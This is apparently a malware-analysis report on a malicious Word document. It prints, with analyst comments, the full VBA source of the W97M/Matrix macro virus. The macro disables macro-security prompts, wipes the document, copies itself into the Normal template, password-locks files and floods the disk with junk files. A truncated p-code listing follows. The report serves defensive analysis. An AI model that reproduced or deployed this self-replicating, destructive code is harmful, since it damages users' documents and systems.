Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2a544356d0779354…

MALICIOUS

Office (OLE)

31.5 KB Created: 2000-08-09 14:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ece6e34dca2c836b6bc013ec7852a194 SHA-1: 4192b2391c6af07e15135a1bf2e06ffe42f3cfaa SHA-256: 2a544356d0779354c45be7204aed63ebc09b47a74ff0edd8b5e765a5c30f613f
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro attempts to disable security features and alter application settings, including setting the registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\MVP to 'Enabled by Total Konfuzion'. It also manipulates application properties like the caption and user information, suggesting an attempt to disguise its malicious nature. The macro's actions indicate it is designed to facilitate the execution of further malicious code.

Heuristics 3

  • ClamAV: Doc.Trojan.Chameleon-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Chameleon-13
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10696 bytes
SHA-256: 77d53a2247974e5062c4320e8fae2bb21fcf05740ce533d0524669b55df8a857
Preview script
First 1,000 lines of the extracted script
' Analyst note: module attribute lines as recovered from the VBA stream (module metadata, not
' executable statements). VB_Name identifies this as the ThisDocument module, whose Document_Open
' handler below fires automatically when the document is opened (see the OLE_VBA_DOCOPEN finding).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: auto-executing entry point. Document_Open runs when the document is opened (the
' OLE_VBA_DOCOPEN finding above). The body follows the classic Word 97 macro-virus pattern seen in
' this sample: silence Word's macro-security prompts, deface the document, copy its own source into
' the Normal template, password-protect the document, then flood the disk with junk files.
Private Sub Document_Open()
    ' Every runtime error is swallowed, so any step that fails (e.g. a missing menu item) is skipped silently.
    On Error Resume Next
    ' "mfm" is declared but the loop below uses "mfn"; with no Option Explicit, mfn, i, Vx and d are
    ' implicit Variants. Cosmetic for analysis, but worth knowing when matching against the p-code listing.
    Dim b, mfm, fn, mi, ma, cfn
    ' Infection-marker check: PrivateProfileString with an empty filename reads the registry value
    ' HKLM\Software\Microsoft\Windows\CurrentVersion\MVP. The payload runs only while the marker is
    ' absent. Note that the extracted source only READS this value; no write to it appears here.
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then
        ' Disable Word's macro-virus warning and the save/convert prompts. "(Rnd * 0)" is an
        ' obfuscated 0 (False) and "(Rnd * 0) + 1" an obfuscated 1 (True) throughout this macro.
        With Options
            .VirusProtection = (Rnd * 0)
            .SaveNormalPrompt = (Rnd * 0)
            .ConfirmConversions = (Rnd * 0)
            .SavePropertiesPrompt = (Rnd * 0)
            .BlueScreen = (Rnd * 0) + 1
        End With
        ' Grey out the menu entries a user would reach for to inspect or remove the macro.
        CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
        CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0)
        CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0)
        ' Rebrand the running application: window caption plus the user name/initials/address that
        ' Word stamps into document properties. These strings are stable indicators for this family.
        With Application
            .Caption = "Micro$oft Matrix"
            .UserName = "Total Konfuzion"
            .UserInitials = "TK"
            .UserAddress = "W97M/Matrix" & vbCr & "The Matrix has you."
        End With
        ' Defacement: select the whole document, delete it, and type the "Matrix" banner in its place.
        With Selection
            .HomeKey Unit:=wdStory
            .EndKey Unit:=wdStory, Extend:=wdExtend
            .Delete Unit:=wdCharacter, Count:=1
            .ParagraphFormat.Alignment = wdAlignParagraphCenter
            .Font.Name = "Arial"
            .Font.Bold = (Rnd * 0) + 1
            .Font.Size = 20
            .Font.Animation = wdAnimationShimmer
            .TypeText Text:="The Matrix has you."
            For b = 1 To 7
                .TypeParagraph
            Next b
            .Font.Bold = (Rnd * 0)
            .Font.Italic = (Rnd * 0) + 1
            .Font.Size = 8
            .Font.Animation = wdAnimationNone
            .TypeText Text:="Follow the white rabbit."
            .Font.Italic = (Rnd * 0)
            For b = 1 To 3
                .TypeParagraph
            Next b
            .Font.Bold = (Rnd * 0) + 1
            .TypeText Text:="()...()"
            .TypeParagraph
            .TypeText Text:="( ' = ' )"
            .TypeParagraph
            .TypeText Text:="(''')(''')"
        End With
        Selection.HomeKey Unit:=wdStory
        ' Self-replication. Target "i" is the Normal template when the macro runs from a document, or
        ' the active document when it already runs from the template. The full source of this module
        ' (Vx) is then copied over the target's first code module, replacing whatever was there.
        ' Because Normal.dot is loaded on every Word start, this is the persistence step.
        If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument
        Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Set d = i.VBProject.VBComponents.Item(1).CodeModule
        d.DeleteLines 1, d.CountOfLines
        d.AddFromString Vx
        ' Lock the document with open and write passwords (hard-coded "ashley").
        With ActiveDocument
            .ReadOnlyRecommended = (Rnd * 0) + 1
            .Password = "ashley"
            .WritePassword = "ashley"
        ' NOTE(review): "End If" here closes a "With" block. As written this module would not compile
        ' in VBA, so either this is an artefact of the decoded source or the macro fails to run in this
        ' form; confirm against the p-code listing that follows the macro before relying on the
        ' behaviour described above.
        End If
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
        ' Disk-filling payload: up to 50,000 files C:\Windows\System\Matrix<n>.sys, each 100,000 lines
        ' of the banner string. Mass file creation under C:\Windows\System by the Word process is the
        ' obvious detection signal for this stage.
        mfn = (Rnd * 0)
        fn = FreeFile
        For mi = 1 To 50000
            mfn = mfn + 1
            Open "C:\Windows\System\Matrix" & mfn & ".sys" For Output As #fn
                For ma = 1 To 100000
                    Print #fn, "The Matrix has you."
                Next ma
            Close #fn
        Next mi
    End If
' W97M/Matrix
'   by: Total Konfuzion
' Are YOU looking for it !!?
End Sub


' Processing file: /opt/analyzer/scan_staging/e6461e442441471aa880a61d2cf20efd.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5294 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Dim 
' 	VarDefn B
' 	VarDefn mfm
' 	VarDefn fn
' 	VarDefn mi
' 	VarDefn ma
' 	VarDefn cfn
' Line #3:
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0003 "MVP"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x001A "Enabled by Total Konfuzion"
' 	Ne 
' 	IfBlock 
' Line #4:
' 	StartWithExp
... (truncated)